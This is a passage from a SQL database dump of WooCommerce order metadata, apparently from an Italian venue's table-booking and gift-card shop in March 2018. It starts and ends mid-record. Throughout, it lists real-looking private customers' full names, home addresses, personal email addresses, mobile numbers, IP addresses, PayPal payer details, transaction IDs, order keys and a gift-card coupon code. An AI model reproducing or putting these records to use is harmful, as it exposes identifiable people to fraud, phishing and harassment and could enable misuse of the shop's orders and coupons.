prenotazione tavolo. Quanti adulti?','4'),(10984,638,'Numero bambini fino a 6 anni','0'),(10985,638,'Numero ragazzi fino a 13 anni','0'),(10986,638,'Files attached','[]'),(10987,638,'Payer PayPal address','nicola@kplusfilm.com'),(10988,638,'Payer first name','NICOLA'),(10989,638,'Payer last name','FEDRIGONI'),(10990,638,'Payment type','instant'),(10991,638,'_paypal_status','completed'),(10992,638,'_download_permissions_granted','yes'),(10993,638,'_recorded_sales','yes'),(10994,638,'_recorded_coupon_usage_counts','yes'),(10995,638,'_order_stock_reduced','yes'),(10996,638,'PayPal Transaction Fee','7.15'),(10997,639,'_order_key','wc_order_5aa3c42f2c766'),(10998,639,'_customer_user','23'),(10999,639,'_payment_method','paypal'),(11000,639,'_payment_method_title','PayPal'),(11001,639,'_transaction_id',''),(11002,639,'_customer_ip_address','79.12.38.9'),(11003,639,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64; rv:58.0) gecko/20100101 firefox/58.0'),(11004,639,'_created_via','checkout'),(11005,639,'_date_completed',''),(11006,639,'_completed_date',''),(11007,639,'_date_paid',''),(11008,639,'_paid_date',''),(11009,639,'_cart_hash','606ba2fcc97053f8218eb22d3c9ed784'),(11010,639,'_billing_first_name','Andrea'),(11011,639,'_billing_last_name','Mennini'),(11012,639,'_billing_company',''),(11013,639,'_billing_address_1','Via Giustiniano Grosoli 2'),(11014,639,'_billing_address_2',''),(11015,639,'_billing_city','Carpi'),(11016,639,'_billing_state',''),(11017,639,'_billing_postcode',''),(11018,639,'_billing_country',''),(11019,639,'_billing_email','andrea.mennini@gmail.com'),(11020,639,'_billing_phone','335222030'),(11021,639,'_shipping_first_name',''),(11022,639,'_shipping_last_name',''),(11023,639,'_shipping_company',''),(11024,639,'_shipping_address_1',''),(11025,639,'_shipping_address_2',''),(11026,639,'_shipping_city',''),(11027,639,'_shipping_state',''),(11028,639,'_shipping_postcode',''),(11029,639,'_shipping_country',''),(11030,639,'_order_currency','EUR'),(11031,639,'_cart_discount','0'),(11032,639,'_cart_discount_tax','0'),(11033,639,'_order_shipping','0.00'),(11034,639,'_order_shipping_tax','0'),(11035,639,'_order_tax','0'),(11036,639,'_order_total','50.00'),(11037,639,'_order_version','3.3.3'),(11038,639,'_prices_include_tax','no'),(11039,639,'_billing_address_index','Andrea Mennini  Via Giustiniano Grosoli 2  Carpi    andrea.mennini@gmail.com 335222030'),(11040,639,'_shipping_address_index','        '),(11041,639,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(11042,639,'Numero bambini fino a 6 anni','0'),(11043,639,'Numero ragazzi fino a 13 anni','0'),(11044,639,'Files attached','[]'),(11045,640,'_order_key','wc_order_5aa3d2ce97027'),(11046,640,'_customer_user','0'),(11047,640,'_payment_method','paypal'),(11048,640,'_payment_method_title','PayPal'),(11049,640,'_transaction_id','18D15927626917242'),(11050,640,'_customer_ip_address','79.12.38.9'),(11051,640,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64; rv:58.0) gecko/20100101 firefox/58.0'),(11052,640,'_created_via','checkout'),(11053,640,'_date_completed',''),(11054,640,'_completed_date',''),(11055,640,'_date_paid','1520686005'),(11056,640,'_paid_date','2018-03-10 13:46:45'),(11057,640,'_cart_hash','606ba2fcc97053f8218eb22d3c9ed784'),(11058,640,'_billing_first_name','Andrea'),(11059,640,'_billing_last_name','Mennini'),(11060,640,'_billing_company',''),(11061,640,'_billing_address_1','Via Giustiniano Grosoli 2'),(11062,640,'_billing_address_2',''),(11063,640,'_billing_city','Carpi'),(11064,640,'_billing_state',''),(11065,640,'_billing_postcode',''),(11066,640,'_billing_country',''),(11067,640,'_billing_email','andrea@mennini.org'),(11068,640,'_billing_phone','335222030'),(11069,640,'_shipping_first_name',''),(11070,640,'_shipping_last_name',''),(11071,640,'_shipping_company',''),(11072,640,'_shipping_address_1',''),(11073,640,'_shipping_address_2',''),(11074,640,'_shipping_city',''),(11075,640,'_shipping_state',''),(11076,640,'_shipping_postcode',''),(11077,640,'_shipping_country',''),(11078,640,'_order_currency','EUR'),(11079,640,'_cart_discount','0'),(11080,640,'_cart_discount_tax','0'),(11081,640,'_order_shipping','0.00'),(11082,640,'_order_shipping_tax','0'),(11083,640,'_order_tax','0'),(11084,640,'_order_total','50.00'),(11085,640,'_order_version','3.3.3'),(11086,640,'_prices_include_tax','no'),(11087,640,'_billing_address_index','Andrea Mennini  Via Giustiniano Grosoli 2  Carpi    andrea@mennini.org 335222030'),(11088,640,'_shipping_address_index','        '),(11089,640,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(11090,640,'Numero bambini fino a 6 anni','0'),(11091,640,'Numero ragazzi fino a 13 anni','0'),(11092,640,'Files attached','[]'),(11093,640,'Payer PayPal address','andrea@mennini.org'),(11094,640,'Payer first name','Andrea'),(11095,640,'Payer last name','Mennini'),(11096,640,'Payment type','instant'),(11097,640,'_paypal_status','completed'),(11098,640,'_download_permissions_granted','yes'),(11099,640,'_recorded_sales','yes'),(11100,640,'_recorded_coupon_usage_counts','yes'),(11101,640,'_order_stock_reduced','yes'),(11102,640,'PayPal Transaction Fee','2.05'),(11103,641,'_order_key','wc_order_5aa6800dc3165'),(11104,641,'_customer_user','24'),(11105,641,'_payment_method','paypal'),(11106,641,'_payment_method_title','PayPal'),(11107,641,'_transaction_id','66F2729953856812L'),(11108,641,'_customer_ip_address','151.42.0.222'),(11109,641,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(11110,641,'_created_via','checkout'),(11111,641,'_date_completed',''),(11112,641,'_completed_date',''),(11113,641,'_date_paid','1520862899'),(11114,641,'_paid_date','2018-03-12 14:54:59'),(11115,641,'_cart_hash','9febc79a4e7e8426e0a174138fa936b0'),(11116,641,'_billing_first_name','Daniela'),(11117,641,'_billing_last_name','Taroni'),(11118,641,'_billing_company',''),(11119,641,'_billing_address_1','Via Dalla Chiesa 40/e'),(11120,641,'_billing_address_2',''),(11121,641,'_billing_city','Castel San Pietro terme'),(11122,641,'_billing_state',''),(11123,641,'_billing_postcode',''),(11124,641,'_billing_country',''),(11125,641,'_billing_email','danielataroni@libero.it'),(11126,641,'_billing_phone','3393834281'),(11127,641,'_shipping_first_name',''),(11128,641,'_shipping_last_name',''),(11129,641,'_shipping_company',''),(11130,641,'_shipping_address_1',''),(11131,641,'_shipping_address_2',''),(11132,641,'_shipping_city',''),(11133,641,'_shipping_state',''),(11134,641,'_shipping_postcode',''),(11135,641,'_shipping_country',''),(11136,641,'_order_currency','EUR'),(11137,641,'_cart_discount','0'),(11138,641,'_cart_discount_tax','0'),(11139,641,'_order_shipping','0.00'),(11140,641,'_order_shipping_tax','0'),(11141,641,'_order_tax','0'),(11142,641,'_order_total','150.00'),(11143,641,'_order_version','3.3.3'),(11144,641,'_prices_include_tax','no'),(11145,641,'_billing_address_index','Daniela Taroni  Via Dalla Chiesa 40/e  Castel San Pietro terme    danielataroni@libero.it 3393834281'),(11146,641,'_shipping_address_index','        '),(11147,641,'Indicare in caso di prenotazione tavolo. Quanti adulti?','6'),(11148,641,'Numero bambini fino a 6 anni','0'),(11149,641,'Numero ragazzi fino a 13 anni','0'),(11150,641,'Files attached','[]'),(11151,641,'Payer PayPal address','danielataroni@libero.it'),(11152,641,'Payer first name','Daniela'),(11153,641,'Payer last name','Taroni'),(11154,641,'Payment type','instant'),(11155,641,'_paypal_status','completed'),(11156,641,'_download_permissions_granted','yes'),(11157,641,'_recorded_sales','yes'),(11158,641,'_recorded_coupon_usage_counts','yes'),(11159,641,'_order_stock_reduced','yes'),(11160,641,'PayPal Transaction Fee','5.45'),(11163,643,'_order_key','wc_order_5aa79f139002d'),(11164,643,'_customer_user','0'),(11165,643,'_payment_method','paypal'),(11166,643,'_payment_method_title','PayPal'),(11167,643,'_transaction_id','62233939LA470624W'),(11168,643,'_customer_ip_address','79.8.8.57'),(11169,643,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/64.0.3282.186 safari/537.36'),(11170,643,'_created_via','checkout'),(11171,643,'_date_completed',''),(11172,643,'_completed_date',''),(11173,643,'_date_paid','1520934712'),(11174,643,'_paid_date','2018-03-13 10:51:52'),(11175,643,'_cart_hash','9febc79a4e7e8426e0a174138fa936b0'),(11176,643,'_billing_first_name','giulio'),(11177,643,'_billing_last_name','martello'),(11178,643,'_billing_company',''),(11179,643,'_billing_address_1','via bologna 5'),(11180,643,'_billing_address_2',''),(11181,643,'_billing_city','carpi (mo)'),(11182,643,'_billing_state',''),(11183,643,'_billing_postcode',''),(11184,643,'_billing_country',''),(11185,643,'_billing_email','hammer79@live.it'),(11186,643,'_billing_phone','3387424812'),(11187,643,'_shipping_first_name',''),(11188,643,'_shipping_last_name',''),(11189,643,'_shipping_company',''),(11190,643,'_shipping_address_1',''),(11191,643,'_shipping_address_2',''),(11192,643,'_shipping_city',''),(11193,643,'_shipping_state',''),(11194,643,'_shipping_postcode',''),(11195,643,'_shipping_country',''),(11196,643,'_order_currency','EUR'),(11197,643,'_cart_discount','0'),(11198,643,'_cart_discount_tax','0'),(11199,643,'_order_shipping','0.00'),(11200,643,'_order_shipping_tax','0'),(11201,643,'_order_tax','0'),(11202,643,'_order_total','150.00'),(11203,643,'_order_version','3.3.3'),(11204,643,'_prices_include_tax','no'),(11205,643,'_billing_address_index','giulio martello  via bologna 5  carpi (mo)    hammer79@live.it 3387424812'),(11206,643,'_shipping_address_index','        '),(11207,643,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(11208,643,'Numero bambini fino a 6 anni','4'),(11209,643,'Numero ragazzi fino a 13 anni','-1'),(11210,643,'Files attached','[]'),(11211,643,'Payer PayPal address','jovanka.c@hotmail.it'),(11212,643,'Payer first name','iovanca'),(11213,643,'Payer last name','ciriello'),(11214,643,'Payment type','instant'),(11215,643,'_paypal_status','completed'),(11216,643,'_download_permissions_granted','yes'),(11217,643,'_recorded_sales','yes'),(11218,643,'_recorded_coupon_usage_counts','yes'),(11219,643,'_order_stock_reduced','yes'),(11220,643,'PayPal Transaction Fee','5.45'),(11221,647,'_order_key','wc_order_5aa93dba59529'),(11222,647,'_customer_user','25'),(11223,647,'_payment_method','paypal'),(11224,647,'_payment_method_title','PayPal'),(11225,647,'_transaction_id',''),(11226,647,'_customer_ip_address','62.196.58.194'),(11227,647,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/64.0.3282.186 safari/537.36'),(11228,647,'_created_via','checkout'),(11229,647,'_date_completed',''),(11230,647,'_completed_date',''),(11231,647,'_date_paid',''),(11232,647,'_paid_date',''),(11233,647,'_cart_hash','532f7045ef39c71e4d995902edd2f652'),(11234,647,'_billing_first_name','Canevari Alessandro'),(11235,647,'_billing_last_name','Canevari'),(11236,647,'_billing_company',''),(11237,647,'_billing_address_1','Via Cabrini 43'),(11238,647,'_billing_address_2',''),(11239,647,'_billing_city','maleo'),(11240,647,'_billing_state',''),(11241,647,'_billing_postcode',''),(11242,647,'_billing_country',''),(11243,647,'_billing_email','ale.canevari@hotmail.it'),(11244,647,'_billing_phone','3392905201'),(11245,647,'_shipping_first_name',''),(11246,647,'_shipping_last_name',''),(11247,647,'_shipping_company',''),(11248,647,'_shipping_address_1',''),(11249,647,'_shipping_address_2',''),(11250,647,'_shipping_city',''),(11251,647,'_shipping_state',''),(11252,647,'_shipping_postcode',''),(11253,647,'_shipping_country',''),(11254,647,'_order_currency','EUR'),(11255,647,'_cart_discount','0'),(11256,647,'_cart_discount_tax','0'),(11257,647,'_order_shipping','0.00'),(11258,647,'_order_shipping_tax','0'),(11259,647,'_order_tax','0'),(11260,647,'_order_total','50.00'),(11261,647,'_order_version','3.3.3'),(11262,647,'_prices_include_tax','no'),(11263,647,'_billing_address_index','Canevari Alessandro Canevari  Via Cabrini 43  maleo    ale.canevari@hotmail.it 3392905201'),(11264,647,'_shipping_address_index','        '),(11265,647,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(11266,647,'Numero bambini fino a 6 anni','0'),(11267,647,'Numero ragazzi fino a 13 anni','0'),(11268,647,'Files attached','[]'),(11269,648,'_order_key','wc_order_5aabc037e6bdd'),(11270,648,'_customer_user','0'),(11271,648,'_payment_method','paypal'),(11272,648,'_payment_method_title','PayPal'),(11273,648,'_transaction_id','7SB98399F5100052B'),(11274,648,'_customer_ip_address','94.164.103.85'),(11275,648,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(11276,648,'_created_via','checkout'),(11277,648,'_date_completed',''),(11278,648,'_completed_date',''),(11279,648,'_date_paid','1521205457'),(11280,648,'_paid_date','2018-03-16 14:04:17'),(11281,648,'_cart_hash','606ba2fcc97053f8218eb22d3c9ed784'),(11282,648,'_billing_first_name','Alessandro'),(11283,648,'_billing_last_name','Angioli'),(11284,648,'_billing_company',''),(11285,648,'_billing_address_1','Via montanara 8/D'),(11286,648,'_billing_address_2',''),(11287,648,'_billing_city','Arezzo'),(11288,648,'_billing_state',''),(11289,648,'_billing_postcode',''),(11290,648,'_billing_country',''),(11291,648,'_billing_email','Alessandro.angioli88@gmail.com'),(11292,648,'_billing_phone','3289637896'),(11293,648,'_shipping_first_name',''),(11294,648,'_shipping_last_name',''),(11295,648,'_shipping_company',''),(11296,648,'_shipping_address_1',''),(11297,648,'_shipping_address_2',''),(11298,648,'_shipping_city',''),(11299,648,'_shipping_state',''),(11300,648,'_shipping_postcode',''),(11301,648,'_shipping_country',''),(11302,648,'_order_currency','EUR'),(11303,648,'_cart_discount','0'),(11304,648,'_cart_discount_tax','0'),(11305,648,'_order_shipping','0.00'),(11306,648,'_order_shipping_tax','0'),(11307,648,'_order_tax','0'),(11308,648,'_order_total','50.00'),(11309,648,'_order_version','3.3.3'),(11310,648,'_prices_include_tax','no'),(11311,648,'_billing_address_index','Alessandro Angioli  Via montanara 8/D  Arezzo    Alessandro.angioli88@gmail.com 3289637896'),(11312,648,'_shipping_address_index','        '),(11313,648,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(11314,648,'Numero bambini fino a 6 anni','0'),(11315,648,'Numero ragazzi fino a 13 anni','0'),(11316,648,'Files attached','[]'),(11317,648,'Payer PayPal address','Alessandro.angioli88@gmail.com'),(11318,648,'Payer first name','Alessandro'),(11319,648,'Payer last name','Angioli'),(11320,648,'Payment type','instant'),(11321,648,'_paypal_status','completed'),(11322,648,'_download_permissions_granted','yes'),(11323,648,'_recorded_sales','yes'),(11324,648,'_recorded_coupon_usage_counts','yes'),(11325,648,'_order_stock_reduced','yes'),(11326,648,'PayPal Transaction Fee','2.05'),(11327,649,'_order_key','wc_order_5aac17bea4821'),(11328,649,'_customer_user','0'),(11329,649,'_payment_method','paypal'),(11330,649,'_payment_method_title','PayPal'),(11331,649,'_transaction_id',''),(11332,649,'_customer_ip_address','5.168.26.11'),(11333,649,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(11334,649,'_created_via','checkout'),(11335,649,'_date_completed',''),(11336,649,'_completed_date',''),(11337,649,'_date_paid',''),(11338,649,'_paid_date',''),(11339,649,'_cart_hash','4b382bd1c0ff6f3a591c58262de178b1'),(11340,649,'_billing_first_name','Diletta'),(11341,649,'_billing_last_name','Luzzi'),(11342,649,'_billing_company',''),(11343,649,'_billing_address_1',''),(11344,649,'_billing_address_2',''),(11345,649,'_billing_city',''),(11346,649,'_billing_state',''),(11347,649,'_billing_postcode',''),(11348,649,'_billing_country',''),(11349,649,'_billing_email','Diletta.luzzi@gmail.com'),(11350,649,'_billing_phone','3281266214'),(11351,649,'_shipping_first_name',''),(11352,649,'_shipping_last_name',''),(11353,649,'_shipping_company',''),(11354,649,'_shipping_address_1',''),(11355,649,'_shipping_address_2',''),(11356,649,'_shipping_city',''),(11357,649,'_shipping_state',''),(11358,649,'_shipping_postcode',''),(11359,649,'_shipping_country',''),(11360,649,'_order_currency','EUR'),(11361,649,'_cart_discount','0'),(11362,649,'_cart_discount_tax','0'),(11363,649,'_order_shipping','0.00'),(11364,649,'_order_shipping_tax','0'),(11365,649,'_order_tax','0'),(11366,649,'_order_total','100.00'),(11367,649,'_order_version','3.3.3'),(11368,649,'_prices_include_tax','no'),(11369,649,'_billing_address_index','Diletta Luzzi        Diletta.luzzi@gmail.com 3281266214'),(11370,649,'_shipping_address_index','        '),(11371,649,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(11372,649,'Numero bambini fino a 6 anni','0'),(11373,649,'Numero ragazzi fino a 13 anni','0'),(11374,649,'Files attached','[]'),(11375,650,'_order_key','wc_order_5aaea8e8627a5'),(11376,650,'_customer_user','0'),(11377,650,'_payment_method','paypal'),(11378,650,'_payment_method_title','PayPal'),(11379,650,'_transaction_id','0PL801840Y853012W'),(11380,650,'_customer_ip_address','87.0.37.63'),(11381,650,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/64.0.3282.186 safari/537.36'),(11382,650,'_created_via','checkout'),(11383,650,'_date_completed',''),(11384,650,'_completed_date',''),(11385,650,'_date_paid','1521396511'),(11386,650,'_paid_date','2018-03-18 19:08:31'),(11387,650,'_cart_hash','532f7045ef39c71e4d995902edd2f652'),(11388,650,'_billing_first_name','Alessandro'),(11389,650,'_billing_last_name','Canevari'),(11390,650,'_billing_company',''),(11391,650,'_billing_address_1','via Cabrini 43'),(11392,650,'_billing_address_2',''),(11393,650,'_billing_city','Maleo'),(11394,650,'_billing_state',''),(11395,650,'_billing_postcode',''),(11396,650,'_billing_country',''),(11397,650,'_billing_email','ale.canevari@hotmail.it'),(11398,650,'_billing_phone','3392905201'),(11399,650,'_shipping_first_name',''),(11400,650,'_shipping_last_name',''),(11401,650,'_shipping_company',''),(11402,650,'_shipping_address_1',''),(11403,650,'_shipping_address_2',''),(11404,650,'_shipping_city',''),(11405,650,'_shipping_state',''),(11406,650,'_shipping_postcode',''),(11407,650,'_shipping_country',''),(11408,650,'_order_currency','EUR'),(11409,650,'_cart_discount','0'),(11410,650,'_cart_discount_tax','0'),(11411,650,'_order_shipping','0.00'),(11412,650,'_order_shipping_tax','0'),(11413,650,'_order_tax','0'),(11414,650,'_order_total','50.00'),(11415,650,'_order_version','3.3.3'),(11416,650,'_prices_include_tax','no'),(11417,650,'_billing_address_index','Alessandro Canevari  via Cabrini 43  Maleo    ale.canevari@hotmail.it 3392905201'),(11418,650,'_shipping_address_index','        '),(11419,650,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(11420,650,'Numero bambini fino a 6 anni','0'),(11421,650,'Numero ragazzi fino a 13 anni','0'),(11422,650,'Files attached','[]'),(11423,650,'Payer PayPal address','ale.canevari@hotmail.it'),(11424,650,'Payer first name','Alessandro'),(11425,650,'Payer last name','Canevari'),(11426,650,'Payment type','instant'),(11427,650,'_paypal_status','completed'),(11428,650,'_download_permissions_granted','yes'),(11429,650,'_recorded_sales','yes'),(11430,650,'_recorded_coupon_usage_counts','yes'),(11431,650,'_order_stock_reduced','yes'),(11432,650,'PayPal Transaction Fee','2.05'),(11433,651,'_order_key','wc_order_5aaeb3bc2d255'),(11434,651,'_customer_user','0'),(11435,651,'_payment_method','paypal'),(11436,651,'_payment_method_title','PayPal'),(11437,651,'_transaction_id','7RT13003KK200703B'),(11438,651,'_customer_ip_address','213.45.73.186'),(11439,651,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_10_5) applewebkit/603.3.8 (khtml, like gecko) version/10.1.2 safari/603.3.8'),(11440,651,'_created_via','checkout'),(11441,651,'_date_completed',''),(11442,651,'_completed_date',''),(11443,651,'_date_paid','1521398747'),(11444,651,'_paid_date','2018-03-18 19:45:47'),(11445,651,'_cart_hash','9febc79a4e7e8426e0a174138fa936b0'),(11446,651,'_billing_first_name','Alberto'),(11447,651,'_billing_last_name','Argnani'),(11448,651,'_billing_company',''),(11449,651,'_billing_address_1',''),(11450,651,'_billing_address_2',''),(11451,651,'_billing_city',''),(11452,651,'_billing_state',''),(11453,651,'_billing_postcode',''),(11454,651,'_billing_country',''),(11455,651,'_billing_email','alberto.argnani@tiscali.it'),(11456,651,'_billing_phone','3201437853'),(11457,651,'_shipping_first_name',''),(11458,651,'_shipping_last_name',''),(11459,651,'_shipping_company',''),(11460,651,'_shipping_address_1',''),(11461,651,'_shipping_address_2',''),(11462,651,'_shipping_city',''),(11463,651,'_shipping_state',''),(11464,651,'_shipping_postcode',''),(11465,651,'_shipping_country',''),(11466,651,'_order_currency','EUR'),(11467,651,'_cart_discount','0'),(11468,651,'_cart_discount_tax','0'),(11469,651,'_order_shipping','0.00'),(11470,651,'_order_shipping_tax','0'),(11471,651,'_order_tax','0'),(11472,651,'_order_total','150.00'),(11473,651,'_order_version','3.3.3'),(11474,651,'_prices_include_tax','no'),(11475,651,'_billing_address_index','Alberto Argnani        alberto.argnani@tiscali.it 3201437853'),(11476,651,'_shipping_address_index','        '),(11477,651,'Indicare in caso di prenotazione tavolo. Quanti adulti?','6'),(11478,651,'Numero bambini fino a 6 anni','0'),(11479,651,'Numero ragazzi fino a 13 anni','0'),(11480,651,'Files attached','[]'),(11481,651,'Payer PayPal address','alberto.argnani@tiscali.it'),(11482,651,'Payer first name','Alberto'),(11483,651,'Payer last name','Argnani'),(11484,651,'Payment type','instant'),(11485,651,'_paypal_status','completed'),(11486,651,'_download_permissions_granted','yes'),(11487,651,'_recorded_sales','yes'),(11488,651,'_recorded_coupon_usage_counts','yes'),(11489,651,'_order_stock_reduced','yes'),(11490,651,'PayPal Transaction Fee','5.45'),(11491,652,'_order_key','wc_order_5ab11858b408d'),(11492,652,'_customer_user','0'),(11493,652,'_payment_method','paypal'),(11494,652,'_payment_method_title','PayPal'),(11495,652,'_transaction_id','8WB9987583875404B'),(11496,652,'_customer_ip_address','80.17.243.138'),(11497,652,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; maarjs; rv:11.0) like gecko'),(11498,652,'_created_via','checkout'),(11499,652,'_date_completed','1521555772'),(11500,652,'_completed_date','2018-03-20 15:22:52'),(11501,652,'_date_paid','1521555653'),(11502,652,'_paid_date','2018-03-20 15:20:53'),(11503,652,'_cart_hash','686f1339517329c03db6c8e3353fa8a7'),(11504,652,'_billing_first_name','VIRGINIA'),(11505,652,'_billing_last_name','RIVOLI'),(11506,652,'_billing_company',''),(11507,652,'_billing_address_1',''),(11508,652,'_billing_address_2',''),(11509,652,'_billing_city',''),(11510,652,'_billing_state',''),(11511,652,'_billing_postcode',''),(11512,652,'_billing_country',''),(11513,652,'_billing_email','virgirunning@gmail.com'),(11514,652,'_billing_phone','3396087284'),(11515,652,'_shipping_first_name',''),(11516,652,'_shipping_last_name',''),(11517,652,'_shipping_company',''),(11518,652,'_shipping_address_1',''),(11519,652,'_shipping_address_2',''),(11520,652,'_shipping_city',''),(11521,652,'_shipping_state',''),(11522,652,'_shipping_postcode',''),(11523,652,'_shipping_country',''),(11524,652,'_order_currency','EUR'),(11525,652,'_cart_discount','0'),(11526,652,'_cart_discount_tax','0'),(11527,652,'_order_shipping','0.00'),(11528,652,'_order_shipping_tax','0'),(11529,652,'_order_tax','0'),(11530,652,'_order_total','98.00'),(11531,652,'_order_version','3.3.3'),(11532,652,'_prices_include_tax','no'),(11533,652,'_billing_address_index','VIRGINIA RIVOLI        virgirunning@gmail.com 3396087284'),(11534,652,'_shipping_address_index','        '),(11535,652,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(11536,652,'Numero bambini fino a 6 anni','0'),(11537,652,'Numero ragazzi fino a 13 anni','0'),(11538,652,'Files attached','[]'),(11539,652,'Payer PayPal address','virgirunning@gmail.com'),(11540,652,'Payer first name','VIRGINIA'),(11541,652,'Payer last name','RIVOLI'),(11542,652,'Payment type','instant'),(11543,652,'_paypal_status','completed'),(11544,652,'_download_permissions_granted','yes'),(11545,652,'_recorded_sales','yes'),(11546,652,'_recorded_coupon_usage_counts','yes'),(11547,653,'discount_type','fixed_cart'),(11548,653,'coupon_amount','98'),(11549,653,'individual_use','no'),(11550,653,'usage_limit','1'),(11551,653,'expiry_date','2018-09-16'),(11552,653,'apply_before_tax','no'),(11553,653,'free_shipping','no'),(11554,653,'minimum_amount',''),(11555,653,'maximum_amount',''),(11556,653,'exclude_sale_items','no'),(11557,653,'exclude_product_ids',''),(11558,653,'exclude_product_categories',''),(11559,653,'mwb_wgm_giftcard_coupon','652'),(11560,653,'mwb_wgm_giftcard_coupon_unique','online'),(11561,653,'mwb_wgm_giftcard_coupon_product_id','435'),(11562,653,'mwb_wgm_giftcard_coupon_mail_to','MARTINO'),(11563,652,'652#194','solymarcouponBQ9Q4'),(11564,652,'mwb_wgm_order_giftcard','send'),(11565,652,'_order_stock_reduced','yes'),(11566,652,'PayPal Transaction Fee','3.68'),(11567,655,'_order_key','wc_order_5ab2af0ab0163'),(11568,655,'_customer_user','0'),(11569,655,'_payment_method','paypal'),(11570,655,'_payment_method_title','PayPal'),(11571,655,'_transaction_id','4TB54684GX0517111'),(11572,655,'_customer_ip_address','5.90.9.26'),(11573,655,'_customer_user_agent','mozilla/5.0 (linux; android 7.0; sm-g925f build/nrd90m) applewebkit/537.36 (khtml, like gecko) chrome/65.0.3325.109 mobile safari/537.36'),(11574,655,'_created_via','checkout'),(11575,655,'_date_completed',''),(11576,655,'_completed_date',''),(11577,655,'_date_paid','1521659954'),(11578,655,'_paid_date','2018-03-21 20:19:14'),(11579,655,'_cart_hash','532f7045ef39c71e4d995902edd2f652'),(11580,655,'_billing_first_name','Luca'),(11581,655,'_billing_last_name','Archi'),(11582,655,'_billing_company',''),(11583,655,'_billing_address_1',''),(11584,655,'_billing_address_2',''),(11585,655,'_billing_city',''),(11586,655,'_billing_state',''),(11587,655,'_billing_postcode',''),(11588,655,'_billing_country',''),(11589,655,'_billing_email','Giulia.grillenzoni@garcspa.it'),(11590,655,'_billing_phone','3334614716'),(11591,655,'_shipping_first_name',''),(11592,655,'_shipping_last_name',''),(11593,655,'_shipping_company',''),(11594,655,'_shipping_address_1',''),(11595,655,'_shipping_address_2',''),(11596,655,'_shipping_city',''),(11597,655,'_shipping_state',''),(11598,655,'_shipping_postcode',''),(11599,655,'_shipping_country',''),(11600,655,'_order_currency','EUR'),(11601,655,'_cart_discount','0'),(11602,655,'_cart_discount_tax','0'),(11603,655,'_order_shipping','0.00'),(11604,655,'_order_shipping_tax','0'),(11605,655,'_order_tax','0'),(11606,655,'_order_total','50.00'),(11607,655,'_order_version','3.3.4'),(11608,655,'_prices_include_tax','no'),(11609,655,'_billing_address_index','Luca Archi        Giulia.grillenzoni@garcspa.it 3334614716'),(11610,655,'_shipping_address_index','        '),(11611,655,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(11612,655,'Numero bambini fino a 6 anni','0'),(11613,655,'Numero ragazzi fino a 13 anni','0'),(11614,655,'Files attached','[]'),(11615,655,'Payer PayPal address','giulia.grillenzoni@garcspa.it'),(11616,655,'Payer first name','GIULIA'),(11617,655,'Payer last name','GRILLENZONI'),(11618,655,'Payment type','instant'),(11619,655,'_paypal_status','completed'),(11620,655,'_download_permissions_granted','yes'),(11621,655,'_recorded_sales','yes'),(11622,655,'_recorded_coupon_usage_counts','yes'),(11623,655,'_order_stock_reduced','yes'),(11624,655,'PayPal Transaction Fee','2.05'),(11625,656,'_order_key','wc_order_5ab52ce7831a7'),(11626,656,'_customer_user','26'),(11627,656,'_payment_method','paypal'),(11628,656,'_payment_method_title','PayPal'),(11629,656,'_transaction_id','23P3012241649070P'),(11630,656,'_customer_ip_address','151.82.146.56'),(11631,656,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(11632,656,'_created_via','checkout'),(11633,656,'_date_completed',''),(11634,656,'_completed_date',''),(11635,656,'_date_paid','1521823063'),(11636,656,'_paid_date','2018-03-23 17:37:43'),(11637,656,'_cart_hash','532f7045ef39c71e4d995902edd2f652'),(11638,656,'_billing_first_name','Martina'),(11639,656,'_billing_last_name','Mazzucchelli'),(11640,656,'_billing_company',''),(11641,656,'_billing_address_1','Via fornaci'),(11642,656,'_billing_address_2',''),(11643,656,'_billing_city','Carpi'),(11644,656,'_billing_state',''),(11645,656,'_billing_postcode',''),(11646,656,'_billing_country',''),(11647,656,'_billing_email','Martinamazzucchelli@gmail.com'),(11648,656,'_billing_phone','3459637240'),(11649,656,'_shipping_first_name',''),(11650,656,'_shipping_last_name',''),(11651,656,'_shipping_company',''),(11652,656,'_shipping_address_1',''),(11653,656,'_shipping_address_2',''),(11654,656,'_shipping_city',''),(11655,656,'_shipping_state',''),(11656,656,'_shipping_postcode',''),(11657,656,'_shipping_country',''),(11658,656,'_order_currency','EUR'),(11659,656,'_cart_discount','0'),(11660,656,'_cart_discount_tax','0'),(11661,656,'_order_shipping','0.00'),(11662,656,'_order_shipping_tax','0'),(11663,656,'_order_tax','0'),(11664,656,'_order_total','50.00'),(11665,656,'_order_version','3.3.4'),(11666,656,'_prices_include_tax','no'),(11667,656,'_billing_address_index','Martina Mazzucchelli  Via fornaci  Carpi    Martinamazzucchelli@gmail.com 3459637240'),(11668,656,'_shipping_address_index','        '),(11669,656,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(11670,656,'Numero bambini fino a 6 